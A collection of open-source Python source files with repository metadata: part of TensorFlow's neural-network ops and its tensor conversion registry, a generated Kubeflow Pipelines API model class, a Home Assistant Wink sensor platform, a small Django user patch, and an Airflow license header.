`strides[0] = strides[3] = 1`. For the most common case of the same
horizontal and vertical strides, `strides = [1, stride, stride, 1]`.
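  As an illustrative shape example, with a `[1, 8, 8, 3]` input, a
  `[3, 3, 3, 2]` depthwise filter and a `[1, 1, 6, 16]` pointwise filter
  (unit strides, `'SAME'` padding), the depthwise stage produces a
  `[1, 8, 8, 6]` intermediate result and the pointwise stage mixes its 6
  channels into a `[1, 8, 8, 16]` output.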
Args:
input: 4-D `Tensor` with shape `[batch, in_height, in_width, in_channels]`.
depthwise_filter: 4-D `Tensor` with shape
`[filter_height, filter_width, in_channels, channel_multiplier]`.
Contains `in_channels` convolutional filters of depth 1.
pointwise_filter: 4-D `Tensor` with shape
`[1, 1, channel_multiplier * in_channels, out_channels]`. Pointwise
filter to mix channels after `depthwise_filter` has convolved spatially.
strides: 1-D of size 4. The strides for the depthwise convolution for
each dimension of `input`.
padding: A string, either `'VALID'` or `'SAME'`. The padding algorithm.
name: A name for this operation (optional).
Returns:
A 4-D `Tensor` of shape `[batch, out_height, out_width, out_channels]`.
"""
with ops.op_scope([input, depthwise_filter, pointwise_filter],
name, "separable_conv2d") as name:
input = ops.convert_to_tensor(input, name="tensor_in")
depthwise_filter = ops.convert_to_tensor(depthwise_filter,
name="depthwise_filter")
pointwise_filter = ops.convert_to_tensor(pointwise_filter,
name="pointwise_filter")
if pointwise_filter.get_shape().ndims is not None:
assert len(pointwise_filter.get_shape()) == 4
assert pointwise_filter.get_shape()[0] == 1
assert pointwise_filter.get_shape()[1] == 1
if depthwise_filter.get_shape().ndims and input.get_shape().ndims:
channel_multiplier = depthwise_filter.get_shape()[3]
in_channels = input.get_shape()[3]
out_channels = pointwise_filter.get_shape()[3]
      # This check ensures the separable convolution is not over-parametrized.
assert channel_multiplier * in_channels < out_channels
# The layout of the ops in the graph are expected to be as follows:
# separable_conv2d // Conv2D op corresponding to the pointwise conv.
    # separable_conv2d/depthwise  // Concat op for the depthwise outputs.
# separable_conv2d/depthwise/depth0 // Conv2D op for depth 0
# separable_conv2d/depthwise/depth1 // Conv2D op for depth 1
# separable_conv2d/depthwise/depth2 // Conv2D op for depth 2
depthwise = depthwise_conv2d(input, depthwise_filter, strides,
padding, name="depthwise")
return nn_ops.conv2d(depthwise, pointwise_filter, [1, 1, 1, 1],
padding="VALID", name=name)
def moments(x, axes, name=None):
"""Calculate the mean and variance of `x`.
The mean and variance are calculated by aggregating the contents of `x`
across `axes`. If `x` is 1-D and `axes = [0]` this is just the mean
and variance of a vector.
  For so-called "global normalization" needed for convolutional filters, pass
  `axes=[0, 1, 2]` (batch, height, width). For batch normalization, pass
  `axes=[0]` (batch).
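  For example (an illustrative sketch; `x` stands for a 4-D activation of
  shape `[batch, height, width, depth]`):
      mean, variance = tf.nn.moments(x, axes=[0, 1, 2])
  computes one mean and one variance per depth channel.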
Args:
x: A `Tensor`.
axes: array of ints. Axes along which to compute mean and
variance.
name: Name used to scope the operations that compute the moments.
Returns:
Two `Tensor` objects: `mean` and `variance`.
"""
with ops.op_scope([x, axes], name, "moments"):
x = ops.convert_to_tensor(x, name="x")
x_shape = x.get_shape()
if all(x_shape[d].value is not None for d in axes):
# The shape is known in the relevant axes, so we can statically
# compute the divisor.
divisor = 1.0
for d in set(axes):
divisor *= x.get_shape()[d].value
divisor = constant_op.constant(1.0 / divisor, x.dtype, name="divisor")
else:
divisor = constant_op.constant(1.0, dtype=x.dtype)
x_dynamic_shape = array_ops.shape(x)
for d in set(axes):
divisor *= math_ops.cast(x_dynamic_shape[d], x.dtype)
divisor = math_ops.inv(divisor, name="divisor")
axes = constant_op.constant(axes, name="axes")
# Note: We do not use Mean here because it is very slow on GPU.
# Note 2: The expression below is potentially more stable.
# It is however a bit slower and stability doesn't appear to be an issue.
# mean = math_ops.reduce_sum(math_ops.mul(x, divisor), axes, name="mean")
# var = math_ops.reduce_sum(math_ops.mul(math_ops.square(x - mean),
# divisor), axes,
# name="variance")
mean = math_ops.mul(math_ops.reduce_sum(x, axes), divisor, name="mean")
var = math_ops.mul(math_ops.reduce_sum(math_ops.square(x - mean), axes),
divisor, name="variance")
return mean, var
def _sum_rows(x):
"""Returns a vector summing up each row of the matrix x."""
# _sum_rows(x) is equivalent to math_ops.reduce_sum(x, 1) when x is
# a matrix. The gradient of _sum_rows(x) is more efficient than
# reduce_sum(x, 1)'s gradient in today's implementation. Therefore,
# we use _sum_rows(x) in the nce_loss() computation since the loss
# is mostly used for training.
cols = array_ops.shape(x)[1]
ones_shape = array_ops.pack([cols, 1])
ones = array_ops.ones(ones_shape, x.dtype)
return array_ops.reshape(math_ops.matmul(x, ones), [-1])
def _compute_sampled_logits(weights, biases, inputs, labels, num_sampled,
num_classes, num_true=1,
sampled_values=None,
subtract_log_q=True,
remove_accidental_hits=False,
name=None):
"""Helper function for nce_loss and sampled_softmax_loss functions.
Computes sampled output training logits and labels suitable for implementing
e.g. noise-contrastive estimation (see nce_loss) or sampled softmax (see
sampled_softmax_loss).
Note: In the case where num_true > 1, we assign to each target class
the target probability 1 / num_true so that the target probabilities
sum to 1 per-example.
Args:
weights: A `Tensor` of shape `[num_classes, dim]`, or a list of `Tensor`
objects whose concatenation along dimension 0 has shape
`[num_classes, dim]`. The (possibly-sharded) class embeddings.
biases: A `Tensor` of shape `[num_classes]`. The class biases.
inputs: A `Tensor` of shape `[batch_size, dim]`. The forward
activations of the input network.
labels: A `Tensor` of type `int64` and shape `[batch_size,
num_true]`. The target classes. Note that this format differs from
the `labels` argument of `nn.softmax_cross_entropy_with_logits`.
num_sampled: An `int`. The number of classes to randomly sample per batch.
num_classes: An `int`. The number of possible classes.
num_true: An `int`. The number of target classes per training example.
sampled_values: a tuple of (`sampled_candidates`, `true_expected_count`,
`sampled_expected_count`) returned by a `*_candidate_sampler` function.
(if None, we default to `log_uniform_candidate_sampler`)
subtract_log_q: A `bool`. whether to subtract the log expected count of
the labels in the sample to get the logits of the true labels.
Default is True. Turn off for Negative Sampling.
remove_accidental_hits: A `bool`. whether to remove "accidental hits"
where a sampled class equals one of the target classes. Default is
False.
name: A name for the operation (optional).
Returns:
out_logits, out_labels: `Tensor` objects each with shape
`[batch_size, num_true + num_sampled]`, for passing to either
`nn.sigmoid_cross_entropy_with_logits` (NCE) or
`nn.softmax_cross_entropy_with_logits` (sampled softmax).
"""
if not isinstance(weights, list):
weights = [weights]
with ops.op_scope(
weights + [biases, inputs, labels], name, "compute_sampled_logits"):
if labels.dtype != dtypes.int64:
labels = math_ops.cast(labels, dtypes.int64)
labels_flat = array_ops.reshape(labels, [-1])
# Sample the negative labels.
# sampled shape: num_sampled vector
# true_expected_count shape = [batch_size, 1]
# sampled_expected_count shape = num_sampled vector
if sampled_values is None:
sampled_values = candidate_sampling_ops.log_uniform_candidate_sampler(
true_classes=labels,
num_true=num_true,
num_sampled=num_sampled,
unique=True,
range_max=num_classes)
# NOTE: pylint cannot tell that 'sampled_values' is a sequence
# pylint: disable=unpacking-non-sequence
sampled, true_expected_count, sampled_expected_count = sampled_values
# pylint: enable=unpacking-non-sequence
# weights shape is [num_classes, dim]
# labels_flat is a [batch_size * num_true] vector
# true_w shape is [batch_size * num_true, dim]
# true_b is a [batch_size * num_true] vector
true_w = embedding_ops.embedding_lookup(weights, labels_flat)
true_b = embedding_ops.embedding_lookup(biases, labels_flat)
# inputs shape is [batch_size, dim]
# true_w shape is [batch_size * num_true, dim]
# row_wise_dots is [batch_size, num_true, dim]
dim = array_ops.shape(true_w)[1:2]
new_true_w_shape = array_ops.concat(0, [[-1, num_true], dim])
row_wise_dots = math_ops.mul(
array_ops.expand_dims(inputs, 1),
array_ops.reshape(true_w, new_true_w_shape))
# We want the row-wise dot plus biases which yields a
# [batch_size, num_true] tensor of true_logits.
dots_as_matrix = array_ops.reshape(row_wise_dots,
array_ops.concat(0, [[-1], dim]))
true_logits = array_ops.reshape(_sum_rows(dots_as_matrix), [-1, num_true])
true_b = array_ops.reshape(true_b, [-1, num_true])
true_logits += true_b
# Lookup weights and biases for sampled labels.
# sampled is a num_sampled int vector
# sampled_w shape is [num_sampled, dim]
# sampled_b is a num_sampled float vector
sampled_w = embedding_ops.embedding_lookup(weights, sampled)
sampled_b = embedding_ops.embedding_lookup(biases, sampled)
# inputs has shape [batch_size, dim]
# sampled_w has shape [num_sampled, dim]
# sampled_b has shape [num_sampled]
# Apply X*W'+B, which yields [batch_size, num_sampled]
sampled_logits = math_ops.matmul(inputs,
sampled_w,
transpose_b=True) + sampled_b
if remove_accidental_hits:
acc_hits = candidate_sampling_ops.compute_accidental_hits(
labels, sampled, num_true=num_true)
acc_indices, acc_ids, acc_weights = acc_hits
# This is how SparseToDense expects the indices.
acc_indices_2d = array_ops.reshape(acc_indices, [-1, 1])
acc_ids_2d_int32 = array_ops.reshape(math_ops.cast(
acc_ids, dtypes.int32), [-1, 1])
sparse_indices = array_ops.concat(
1, [acc_indices_2d, acc_ids_2d_int32], "sparse_indices")
# Create sampled_logits_shape = [batch_size, num_sampled]
sampled_logits_shape = array_ops.concat(
0,
[array_ops.shape(labels)[:1], array_ops.expand_dims(num_sampled, 0)])
sampled_logits += sparse_ops.sparse_to_dense(
sparse_indices, sampled_logits_shape, acc_weights, 0.0)
if subtract_log_q:
# Subtract log of Q(l), prior probability that l appears in sampled.
true_logits -= math_ops.log(true_expected_count)
sampled_logits -= math_ops.log(sampled_expected_count)
# Construct output logits and labels. The true labels/logits start at col 0.
out_logits = array_ops.concat(1, [true_logits, sampled_logits])
# true_logits is a float tensor, ones_like(true_logits) is a float tensor
# of ones. We then divide by num_true to ensure the per-example labels sum
# to 1.0, i.e. form a proper probability distribution.
out_labels = array_ops.concat(
1, [array_ops.ones_like(true_logits) / num_true,
array_ops.zeros_like(sampled_logits)])
return out_logits, out_labels
def nce_loss(weights, biases, inputs, labels, num_sampled, num_classes,
num_true=1,
sampled_values=None,
remove_accidental_hits=False,
name="nce_loss"):
"""Computes and returns the noise-contrastive estimation training loss.
See [Noise-contrastive estimation: A new estimation principle for
unnormalized statistical models]
(http://www.jmlr.org/proceedings/papers/v9/gutmann10a/gutmann10a.pdf).
Also see our [Candidate Sampling Algorithms Reference]
(http://www.tensorflow.org/extras/candidate_sampling.pdf)
Note: In the case where `num_true` > 1, we assign to each target class
the target probability 1 / `num_true` so that the target probabilities
sum to 1 per-example.
Note: It would be useful to allow a variable number of target classes per
example. We hope to provide this functionality in a future release.
For now, if you have a variable number of target classes, you can pad them
out to a constant number by either repeating them or by padding
with an otherwise unused class.
Args:
weights: A `Tensor` of shape `[num_classes, dim]`, or a list of `Tensor`
objects whose concatenation along dimension 0 has shape
[num_classes, dim]. The (possibly-sharded) class embeddings.
biases: A `Tensor` of shape `[num_classes]`. The class biases.
inputs: A `Tensor` of shape `[batch_size, dim]`. The forward
activations of the input network.
labels: A `Tensor` of type `int64` and shape `[batch_size,
num_true]`. The target classes.
num_sampled: An `int`. The number of classes to randomly sample per batch.
num_classes: An `int`. The number of possible classes.
num_true: An `int`. The number of target classes per training example.
sampled_values: a tuple of (`sampled_candidates`, `true_expected_count`,
`sampled_expected_count`) returned by a `*_candidate_sampler` function.
(if None, we default to `log_uniform_candidate_sampler`)
remove_accidental_hits: A `bool`. Whether to remove "accidental hits"
where a sampled class equals one of the target classes. If set to
`True`, this is a "Sampled Logistic" loss instead of NCE, and we are
learning to generate log-odds instead of log probabilities. See
our [Candidate Sampling Algorithms Reference]
(http://www.tensorflow.org/extras/candidate_sampling.pdf).
Default is False.
name: A name for the operation (optional).
Returns:
A `batch_size` 1-D tensor of per-example NCE losses.
"""
logits, labels = _compute_sampled_logits(
weights, biases, inputs, labels, num_sampled, num_classes,
num_true=num_true,
sampled_values=sampled_values,
subtract_log_q=True,
remove_accidental_hits=remove_accidental_hits,
name=name)
sampled_losses = sigmoid_cross_entropy_with_logits(logits,
labels,
name="sampled_losses")
# sampled_losses is batch_size x {true_loss, sampled_losses...}
# We sum out true and sampled losses.
return _sum_rows(sampled_losses)
def sampled_softmax_loss(weights, biases, inputs, labels, num_sampled,
num_classes, num_true=1,
sampled_values=None,
remove_accidental_hits=True,
name="sampled_softmax_loss"):
"""Computes and returns the sampled softmax training loss.
This is a faster way to train a softmax classifier over a huge number of
classes.
This operation is for training only. It is generally an underestimate of
the full softmax loss.
At inference time, you can compute full softmax probabilities with the
  expression `tf.nn.softmax(tf.matmul(inputs, weights, transpose_b=True) + biases)`.
See our [Candidate Sampling Algorithms Reference]
(http://www.tensorflow.org/extras/candidate_sampling.pdf)
Also see Section 3 of http://arxiv.org/abs/1412.2007 for the math.
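  A minimal usage sketch (names such as `embed` and `vocab_size` are
  placeholders, not part of this module):
      # Training: score only a sampled subset of the classes.
      loss = tf.nn.sampled_softmax_loss(weights, biases, embed, labels,
                                        num_sampled=64,
                                        num_classes=vocab_size)
      # Inference: score every class with the full softmax.
      logits = tf.matmul(embed, weights, transpose_b=True) + biases
      predictions = tf.nn.softmax(logits)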
Args:
weights: A `Tensor` of shape `[num_classes, dim]`, or a list of `Tensor`
objects whose concatenation along dimension 0 has shape
[num_classes, dim]. The (possibly-sharded) class embeddings.
biases: A `Tensor` of shape `[num_classes]`. The class biases.
inputs: A `Tensor` of shape `[batch_size, dim]`. The forward
activations of the input network.
labels: A `Tensor` of type `int64` and shape `[batch_size,
num_true]`. The target classes. Note that this format differs from
the `labels` argument of `nn.softmax_cross_entropy_with_logits`.
num_sampled: An `int`. The number of classes to randomly sample per batch.
num_classes: An `int`. The number of possible classes.
num_true: An `int`. The number of target classes per training example.
sampled_values: a tuple of (`sampled_candidates`, `true_expected_count`,
`sampled_expected_count`) returned by a `*_candidate_sampler` function.
(if None, we default to `log_uniform_candidate_sampler`)
remove_accidental_hits: A `bool`. whether to remove "accidental hits"
where a sampled class equals one of the target classes. Default is
True.
name: A name for the operation (optional).
Returns:
A `batch_size` 1-D tensor of per-example sampled softmax losses.
"""
logits, labels = _compute_sampled_logits(
weights, biases, inputs, labels, num_sampled, num_classes,
num_true=num_true,
sampled_values=sampled_values,
subtract_log_q=True,
remove_accidental_hits=remove_accidental_hits,
name=name)
sampled_losses = nn_ops.softmax_cross_entropy_with_logits(logits, labels)
# sampled_losses is a batch_size vector.
return sampled_losses
|
{
"content_hash": "7fb78ca090aaf653045ea4a558cf4012",
"timestamp": "",
"source": "github",
"line_count": 867,
"max_line_length": 80,
"avg_line_length": 42.509803921568626,
"alnum_prop": 0.6731875406989364,
"repo_name": "MehdiSfr/tensor-flow",
"id": "17160f909e0ec12f303ef92647e4a92231fa5785",
"size": "37601",
"binary": false,
"copies": "1",
"ref": "refs/heads/branch_mehdiExpr",
"path": "tensorflow/python/ops/nn.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "136455"
},
{
"name": "C++",
"bytes": "5591657"
},
{
"name": "CSS",
"bytes": "107"
},
{
"name": "HTML",
"bytes": "640055"
},
{
"name": "Java",
"bytes": "49257"
},
{
"name": "JavaScript",
"bytes": "6252"
},
{
"name": "Jupyter Notebook",
"bytes": "329336"
},
{
"name": "Objective-C",
"bytes": "1288"
},
{
"name": "Protocol Buffer",
"bytes": "45325"
},
{
"name": "Python",
"bytes": "2684789"
},
{
"name": "Shell",
"bytes": "5104"
},
{
"name": "TypeScript",
"bytes": "256549"
}
],
"symlink_target": ""
}
|
"""
Kubeflow Pipelines API
This file contains REST API specification for Kubeflow Pipelines. The file is autogenerated from the swagger definition.
Contact: kubeflow-pipelines@google.com
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from kfp_server_api.configuration import Configuration
class ApiExperiment(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'id': 'str',
'name': 'str',
'description': 'str',
'created_at': 'datetime',
'resource_references': 'list[ApiResourceReference]',
'storage_state': 'ApiExperimentStorageState'
}
attribute_map = {
'id': 'id',
'name': 'name',
'description': 'description',
'created_at': 'created_at',
'resource_references': 'resource_references',
'storage_state': 'storage_state'
}
def __init__(self, id=None, name=None, description=None, created_at=None, resource_references=None, storage_state=None, local_vars_configuration=None): # noqa: E501
"""ApiExperiment - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._id = None
self._name = None
self._description = None
self._created_at = None
self._resource_references = None
self._storage_state = None
self.discriminator = None
if id is not None:
self.id = id
if name is not None:
self.name = name
if description is not None:
self.description = description
if created_at is not None:
self.created_at = created_at
if resource_references is not None:
self.resource_references = resource_references
if storage_state is not None:
self.storage_state = storage_state
@property
def id(self):
"""Gets the id of this ApiExperiment. # noqa: E501
Output. Unique experiment ID. Generated by API server. # noqa: E501
:return: The id of this ApiExperiment. # noqa: E501
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this ApiExperiment.
Output. Unique experiment ID. Generated by API server. # noqa: E501
:param id: The id of this ApiExperiment. # noqa: E501
:type id: str
"""
self._id = id
@property
def name(self):
"""Gets the name of this ApiExperiment. # noqa: E501
Required input field. Unique experiment name provided by user. # noqa: E501
:return: The name of this ApiExperiment. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this ApiExperiment.
Required input field. Unique experiment name provided by user. # noqa: E501
:param name: The name of this ApiExperiment. # noqa: E501
:type name: str
"""
self._name = name
@property
def description(self):
"""Gets the description of this ApiExperiment. # noqa: E501
:return: The description of this ApiExperiment. # noqa: E501
:rtype: str
"""
return self._description
@description.setter
def description(self, description):
"""Sets the description of this ApiExperiment.
:param description: The description of this ApiExperiment. # noqa: E501
:type description: str
"""
self._description = description
@property
def created_at(self):
"""Gets the created_at of this ApiExperiment. # noqa: E501
        Output. The time that the experiment was created.  # noqa: E501
:return: The created_at of this ApiExperiment. # noqa: E501
:rtype: datetime
"""
return self._created_at
@created_at.setter
def created_at(self, created_at):
"""Sets the created_at of this ApiExperiment.
        Output. The time that the experiment was created.  # noqa: E501
:param created_at: The created_at of this ApiExperiment. # noqa: E501
:type created_at: datetime
"""
self._created_at = created_at
@property
def resource_references(self):
"""Gets the resource_references of this ApiExperiment. # noqa: E501
Optional input field. Specify which resource this run belongs to. For Experiment, the only valid resource reference is a single Namespace. # noqa: E501
:return: The resource_references of this ApiExperiment. # noqa: E501
:rtype: list[ApiResourceReference]
"""
return self._resource_references
@resource_references.setter
def resource_references(self, resource_references):
"""Sets the resource_references of this ApiExperiment.
Optional input field. Specify which resource this run belongs to. For Experiment, the only valid resource reference is a single Namespace. # noqa: E501
:param resource_references: The resource_references of this ApiExperiment. # noqa: E501
:type resource_references: list[ApiResourceReference]
"""
self._resource_references = resource_references
@property
def storage_state(self):
"""Gets the storage_state of this ApiExperiment. # noqa: E501
:return: The storage_state of this ApiExperiment. # noqa: E501
:rtype: ApiExperimentStorageState
"""
return self._storage_state
@storage_state.setter
def storage_state(self, storage_state):
"""Sets the storage_state of this ApiExperiment.
:param storage_state: The storage_state of this ApiExperiment. # noqa: E501
:type storage_state: ApiExperimentStorageState
"""
self._storage_state = storage_state
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ApiExperiment):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, ApiExperiment):
return True
return self.to_dict() != other.to_dict()
|
{
"content_hash": "5963476d12c26de55acf5ae1c435bc79",
"timestamp": "",
"source": "github",
"line_count": 256,
"max_line_length": 169,
"avg_line_length": 30.69921875,
"alnum_prop": 0.5976587352080417,
"repo_name": "kubeflow/pipelines",
"id": "3c6369981e9e9d212e6f9ca840b8db78ff4ac90a",
"size": "7876",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "backend/api/v1beta1/python_http_client/kfp_server_api/models/api_experiment.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "799"
},
{
"name": "CSS",
"bytes": "2171"
},
{
"name": "Dockerfile",
"bytes": "49331"
},
{
"name": "Go",
"bytes": "1903937"
},
{
"name": "HTML",
"bytes": "3656"
},
{
"name": "JavaScript",
"bytes": "544297"
},
{
"name": "Jinja",
"bytes": "938"
},
{
"name": "Jupyter Notebook",
"bytes": "359548"
},
{
"name": "Makefile",
"bytes": "22164"
},
{
"name": "Mustache",
"bytes": "23652"
},
{
"name": "PowerShell",
"bytes": "3194"
},
{
"name": "Python",
"bytes": "5684887"
},
{
"name": "Shell",
"bytes": "264595"
},
{
"name": "Smarty",
"bytes": "8295"
},
{
"name": "Starlark",
"bytes": "553"
},
{
"name": "TypeScript",
"bytes": "4294958"
}
],
"symlink_target": ""
}
|
""" Support for Wink sensors. """
import logging
# pylint: disable=no-name-in-module, import-error
import homeassistant.external.wink.pywink as pywink
from homeassistant.helpers.entity import Entity
from homeassistant.const import CONF_ACCESS_TOKEN, STATE_OPEN, STATE_CLOSED
def setup_platform(hass, config, add_devices, discovery_info=None):
""" Sets up the Wink platform. """
if discovery_info is None:
token = config.get(CONF_ACCESS_TOKEN)
if token is None:
logging.getLogger(__name__).error(
"Missing wink access_token - "
"get one at https://winkbearertoken.appspot.com/")
return
pywink.set_bearer_token(token)
add_devices(WinkSensorDevice(sensor) for sensor in pywink.get_sensors())
class WinkSensorDevice(Entity):
""" represents a wink sensor within home assistant. """
def __init__(self, wink):
self.wink = wink
@property
def state(self):
""" Returns the state. """
return STATE_OPEN if self.is_open else STATE_CLOSED
@property
def unique_id(self):
""" Returns the id of this wink sensor """
return "{}.{}".format(self.__class__, self.wink.deviceId())
@property
def name(self):
""" Returns the name of the sensor if any. """
return self.wink.name()
def update(self):
""" Update state of the sensor. """
self.wink.updateState()
@property
def is_open(self):
""" True if door is open. """
return self.wink.state()
|
{
"content_hash": "923a13b80722c1cd6b12da45d14b63a3",
"timestamp": "",
"source": "github",
"line_count": 55,
"max_line_length": 76,
"avg_line_length": 28.327272727272728,
"alnum_prop": 0.6225930680359435,
"repo_name": "sanmiguel/home-assistant",
"id": "ff61f02d041251026da0dd963ac1f073ddffedad",
"size": "1558",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "homeassistant/components/sensor/wink.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "1185687"
},
{
"name": "Python",
"bytes": "681010"
},
{
"name": "Shell",
"bytes": "5074"
}
],
"symlink_target": ""
}
|
"""Registry for tensor conversion functions."""
# pylint: disable=g-bad-name
import collections
import threading
import numpy as np
import six
from tensorflow.python.util import lazy_loader
from tensorflow.python.util.tf_export import tf_export
# Loaded lazily due to a circular dependency
# ops->tensor_conversion_registry->constant_op->ops.
constant_op = lazy_loader.LazyLoader(
"constant_op", globals(),
"tensorflow.python.framework.constant_op")
_tensor_conversion_func_registry = collections.defaultdict(list)
_tensor_conversion_func_cache = {}
_tensor_conversion_func_lock = threading.Lock()
# Instances of these types are always converted using
# `_default_conversion_function`.
_UNCONVERTIBLE_TYPES = six.integer_types + (
float,
np.generic,
np.ndarray,
)
def _default_conversion_function(value, dtype, name, as_ref):
del as_ref # Unused.
return constant_op.constant(value, dtype, name=name)
# TODO(josh11b): Add ctx argument to conversion_func() signature.
@tf_export("register_tensor_conversion_function")
def register_tensor_conversion_function(base_type,
conversion_func,
priority=100):
"""Registers a function for converting objects of `base_type` to `Tensor`.
The conversion function must have the following signature:
```python
def conversion_func(value, dtype=None, name=None, as_ref=False):
# ...
```
It must return a `Tensor` with the given `dtype` if specified. If the
conversion function creates a new `Tensor`, it should use the given
`name` if specified. All exceptions will be propagated to the caller.
The conversion function may return `NotImplemented` for some
inputs. In this case, the conversion process will continue to try
subsequent conversion functions.
If `as_ref` is true, the function must return a `Tensor` reference,
such as a `Variable`.
NOTE: The conversion functions will execute in order of priority,
followed by order of registration. To ensure that a conversion function
`F` runs before another conversion function `G`, ensure that `F` is
registered with a smaller priority than `G`.
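  For example (a hedged sketch, assuming TensorFlow is imported as `tf`;
  `Wrapper` and `_wrapper_to_tensor` are hypothetical names, not part of the
  library):
  ```python
  class Wrapper(object):
    def __init__(self, value):
      self.value = value
  def _wrapper_to_tensor(value, dtype=None, name=None, as_ref=False):
    del as_ref  # Unused; a plain constant is returned.
    return tf.constant(value.value, dtype=dtype, name=name)
  tf.register_tensor_conversion_function(Wrapper, _wrapper_to_tensor)
  # tf.convert_to_tensor(Wrapper([1, 2, 3])) now returns a constant `Tensor`.
  ```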
Args:
base_type: The base type or tuple of base types for all objects that
`conversion_func` accepts.
conversion_func: A function that converts instances of `base_type` to
`Tensor`.
priority: Optional integer that indicates the priority for applying this
conversion function. Conversion functions with smaller priority values run
earlier than conversion functions with larger priority values. Defaults to
100.
Raises:
TypeError: If the arguments do not have the appropriate type.
"""
base_types = base_type if isinstance(base_type, tuple) else (base_type,)
if any(not isinstance(x, type) for x in base_types):
raise TypeError("Argument `base_type` must be a type or a tuple of types. "
f"Obtained: {base_type}")
if any(issubclass(x, _UNCONVERTIBLE_TYPES) for x in base_types):
raise TypeError("Cannot register conversions for Python numeric types and "
"NumPy scalars and arrays.")
del base_types # Only needed for validation.
if not callable(conversion_func):
raise TypeError("Argument `conversion_func` must be callable. Received "
f"{conversion_func}.")
with _tensor_conversion_func_lock:
_tensor_conversion_func_registry[priority].append(
(base_type, conversion_func))
_tensor_conversion_func_cache.clear()
def get(query):
"""Get conversion function for objects of `cls`.
Args:
query: The type to query for.
Returns:
A list of conversion functions in increasing order of priority.
"""
if issubclass(query, _UNCONVERTIBLE_TYPES):
return [(query, _default_conversion_function)]
conversion_funcs = _tensor_conversion_func_cache.get(query)
if conversion_funcs is None:
with _tensor_conversion_func_lock:
# Has another thread populated the cache in the meantime?
conversion_funcs = _tensor_conversion_func_cache.get(query)
if conversion_funcs is None:
conversion_funcs = []
for _, funcs_at_priority in sorted(
_tensor_conversion_func_registry.items()):
conversion_funcs.extend(
(base_type, conversion_func)
for base_type, conversion_func in funcs_at_priority
if issubclass(query, base_type))
_tensor_conversion_func_cache[query] = conversion_funcs
return conversion_funcs
|
{
"content_hash": "430353038af04f2531e2c3746fddbad2",
"timestamp": "",
"source": "github",
"line_count": 124,
"max_line_length": 80,
"avg_line_length": 36.806451612903224,
"alnum_prop": 0.6998247151621385,
"repo_name": "Intel-Corporation/tensorflow",
"id": "6f4ec5ff05bde364a8dffda2684443518c1f271f",
"size": "5253",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tensorflow/python/framework/tensor_conversion_registry.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "7481"
},
{
"name": "C",
"bytes": "183416"
},
{
"name": "C++",
"bytes": "24549804"
},
{
"name": "CMake",
"bytes": "160888"
},
{
"name": "Go",
"bytes": "849081"
},
{
"name": "HTML",
"bytes": "681293"
},
{
"name": "Java",
"bytes": "307123"
},
{
"name": "Jupyter Notebook",
"bytes": "1833659"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "Makefile",
"bytes": "37393"
},
{
"name": "Objective-C",
"bytes": "7037"
},
{
"name": "Objective-C++",
"bytes": "64142"
},
{
"name": "Protocol Buffer",
"bytes": "218430"
},
{
"name": "Python",
"bytes": "21875003"
},
{
"name": "Shell",
"bytes": "337846"
},
{
"name": "TypeScript",
"bytes": "849555"
}
],
"symlink_target": ""
}
|
from django.contrib.auth.models import User
def is_empresa(self):
    return (self.empresa.CUIT is not None) and (self.empresa.CUIT != "")
def is_desocupado(self):
    return (self.desocupado.DNI is not None) and (self.desocupado.DNI != "")
def profile(self):
return self.empresa if self.is_empresa() else self.desocupado
def profile_type(self):
if self.is_desocupado():
return "desocupado"
elif self.is_empresa():
return "empresa"
else:
return "administrador"
User.add_to_class("is_empresa", is_empresa)
User.add_to_class("is_desocupado", is_desocupado)
User.add_to_class("profile", profile)
User.add_to_class("profile_type", profile_type)
|
{
"content_hash": "66f2a03dd99a0bf213f4287936a1f7cc",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 80,
"avg_line_length": 30.17391304347826,
"alnum_prop": 0.6988472622478387,
"repo_name": "agustinhansen/SIDECO",
"id": "9d8414a63a3c94e75e3caa34e7430c68563b676c",
"size": "968",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "app/core/patch.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "869"
},
{
"name": "HTML",
"bytes": "5799"
},
{
"name": "JavaScript",
"bytes": "192909"
},
{
"name": "Python",
"bytes": "22947"
}
],
"symlink_target": ""
}
|
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import airflow
